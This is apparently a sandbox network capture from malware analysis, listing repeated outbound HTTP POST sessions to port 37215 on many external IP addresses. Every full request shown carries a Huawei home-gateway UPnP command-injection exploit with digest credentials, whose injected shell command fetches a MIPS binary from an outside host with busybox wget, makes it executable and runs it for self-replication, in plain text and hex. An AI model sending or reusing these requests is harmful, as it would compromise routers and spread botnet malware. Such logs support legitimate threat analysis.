                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2896192.168.2.2343746157.227.159.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656536102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2897192.168.2.2335088180.75.50.12737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656771898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2898192.168.2.2357160197.76.28.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.657630920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2899192.168.2.2346448197.180.143.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.657635927 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2900192.168.2.2347178157.173.26.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.657686949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2901192.168.2.2351720157.177.217.4837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.657733917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2902192.168.2.2333630157.50.12.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.657746077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2903192.168.2.235648841.3.33.14337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.657757998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2904192.168.2.234129241.144.130.16937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.657946110 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2905192.168.2.2340102197.154.138.1437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.658013105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
